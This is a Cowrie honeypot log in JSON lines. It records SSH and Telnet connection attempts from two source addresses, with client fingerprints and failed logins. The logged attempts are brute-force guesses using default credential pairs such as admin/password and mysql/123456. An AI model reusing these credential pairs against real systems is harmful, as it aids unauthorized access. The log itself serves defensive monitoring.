{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:05:35.672921Z","src_ip":"212.227.125.160","session":"d9db6622c9bf"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin","message":"login attempt [gpadmin/gpadmin] failed","sensor":"my-vps","timestamp":"2025-08-26T22:05:36.009586Z","src_ip":"212.227.125.160","session":"d9db6622c9bf"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:05:37.098343Z","src_ip":"212.227.125.160","session":"d9db6622c9bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34600,"dst_ip":"1.2.3.4","dst_port":22,"session":"90bfe31153c2","protocol":"ssh","message":"New connection: 212.227.125.160:34600 (1.2.3.4:22) [session: 90bfe31153c2]","sensor":"my-vps","timestamp":"2025-08-26T22:05:41.229526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:05:41.230464Z","src_ip":"212.227.125.160","session":"90bfe31153c2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:05:41.293457Z","src_ip":"212.227.125.160","session":"90bfe31153c2"}
{"eventid":"cowrie.login.failed","username":"isabakir","password":"isabakir","message":"login attempt [isabakir/isabakir] failed","sensor":"my-vps","timestamp":"2025-08-26T22:05:41.434378Z","src_ip":"212.227.125.160","session":"90bfe31153c2"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:05:42.481148Z","src_ip":"212.227.125.160","session":"90bfe31153c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58218,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccf9f606a985","protocol":"ssh","message":"New connection: 212.227.125.160:58218 (1.2.3.4:22) [session: ccf9f606a985]","sensor":"my-vps","timestamp":"2025-08-26T22:05:46.756191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:05:46.757328Z","src_ip":"212.227.125.160","session":"ccf9f606a985"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:05:46.807167Z","src_ip":"212.227.125.160","session":"ccf9f606a985"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:05:46.960019Z","src_ip":"212.227.125.160","session":"ccf9f606a985"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:05:48.035186Z","src_ip":"212.227.125.160","session":"ccf9f606a985"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53604,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1201407df2d","protocol":"ssh","message":"New connection: 212.227.125.160:53604 (1.2.3.4:22) [session: c1201407df2d]","sensor":"my-vps","timestamp":"2025-08-26T22:05:51.871508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:05:51.886322Z","src_ip":"212.227.125.160","session":"c1201407df2d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:05:51.920414Z","src_ip":"212.227.125.160","session":"c1201407df2d"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:05:52.114732Z","src_ip":"212.227.125.160","session":"c1201407df2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44166,"dst_ip":"1.2.3.4","dst_port":22,"session":"561acf304253","protocol":"ssh","message":"New connection: 212.227.235.229:44166 (1.2.3.4:22) [session: 561acf304253]","sensor":"my-vps","timestamp":"2025-08-26T22:05:52.408308Z"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:05:53.170208Z","src_ip":"212.227.125.160","session":"c1201407df2d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:05:54.023128Z","src_ip":"212.227.235.229","session":"561acf304253"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:05:54.023916Z","src_ip":"212.227.235.229","session":"561acf304253"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48988,"dst_ip":"1.2.3.4","dst_port":22,"session":"b741cc7dd7c3","protocol":"ssh","message":"New connection: 212.227.125.160:48988 (1.2.3.4:22) [session: b741cc7dd7c3]","sensor":"my-vps","timestamp":"2025-08-26T22:05:57.297189Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:05:57.298182Z","src_ip":"212.227.125.160","session":"b741cc7dd7c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:05:57.365136Z","src_ip":"212.227.125.160","session":"b741cc7dd7c3"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-26T22:05:57.874712Z","src_ip":"212.227.125.160","session":"b741cc7dd7c3"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:05:59.036592Z","src_ip":"212.227.125.160","session":"b741cc7dd7c3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-26T22:05:59.845380Z","src_ip":"212.227.235.229","session":"561acf304253"}
{"eventid":"cowrie.session.closed","duration":"9.8","message":"Connection lost after 9.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:06:02.159345Z","src_ip":"212.227.235.229","session":"561acf304253"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44374,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b3fc7ed602e","protocol":"ssh","message":"New connection: 212.227.125.160:44374 (1.2.3.4:22) [session: 4b3fc7ed602e]","sensor":"my-vps","timestamp":"2025-08-26T22:06:03.213549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:06:03.214581Z","src_ip":"212.227.125.160","session":"4b3fc7ed602e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:06:03.258728Z","src_ip":"212.227.125.160","session":"4b3fc7ed602e"}
{"eventid":"cowrie.login.failed","username":"master","password":"master","message":"login attempt [master/master] failed","sensor":"my-vps","timestamp":"2025-08-26T22:06:03.403674Z","src_ip":"212.227.125.160","session":"4b3fc7ed602e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:06:04.452190Z","src_ip":"212.227.125.160","session":"4b3fc7ed602e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39760,"dst_ip":"1.2.3.4","dst_port":22,"session":"64f339097af9","protocol":"ssh","message":"New connection: 212.227.125.160:39760 (1.2.3.4:22) [session: 64f339097af9]","sensor":"my-vps","timestamp":"2025-08-26T22:06:08.205754Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:06:08.213021Z","src_ip":"212.227.125.160","session":"64f339097af9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:06:08.617433Z","src_ip":"212.227.125.160","session":"64f339097af9"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp","message":"login attempt [uftp/uftp] failed","sensor":"my-vps","timestamp":"2025-08-26T22:06:09.099444Z","src_ip":"212.227.125.160","session":"64f339097af9"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:06:10.161648Z","src_ip":"212.227.125.160","session":"64f339097af9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45689,"dst_ip":"1.2.3.4","dst_port":23,"session":"8f6549d3bd4a","protocol":"telnet","message":"New connection: 212.227.125.160:45689 (1.2.3.4:23) [session: 8f6549d3bd4a]","sensor":"my-vps","timestamp":"2025-08-26T22:06:13.043211Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35144,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf178246012a","protocol":"ssh","message":"New connection: 212.227.125.160:35144 (1.2.3.4:22) [session: bf178246012a]","sensor":"my-vps","timestamp":"2025-08-26T22:06:13.841577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:06:13.842459Z","src_ip":"212.227.125.160","session":"bf178246012a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:06:13.907747Z","src_ip":"212.227.125.160","session":"bf178246012a"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-08-26T22:06:14.094352Z","src_ip":"212.227.125.160","session":"bf178246012a"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:06:15.198248Z","src_ip":"212.227.125.160","session":"bf178246012a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58764,"dst_ip":"1.2.3.4","dst_port":22,"session":"08f8c479916a","protocol":"ssh","message":"New connection: 212.227.125.160:58764 (1.2.3.4:22) [session: 08f8c479916a]","sensor":"my-vps","timestamp":"2025-08-26T22:06:19.192131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:06:19.192915Z","src_ip":"212.227.125.160","session":"08f8c479916a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:06:19.250952Z","src_ip":"212.227.125.160","session":"08f8c479916a"}
{"eventid":"cowrie.login.failed","username":"odoo18","password":"odoo18","message":"login attempt [odoo18/odoo18] failed","sensor":"my-vps","timestamp":"2025-08-26T22:06:19.428023Z","src_ip":"212.227.125.160","session":"08f8c479916a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:06:20.481043Z","src_ip":"212.227.125.160","session":"08f8c479916a"}
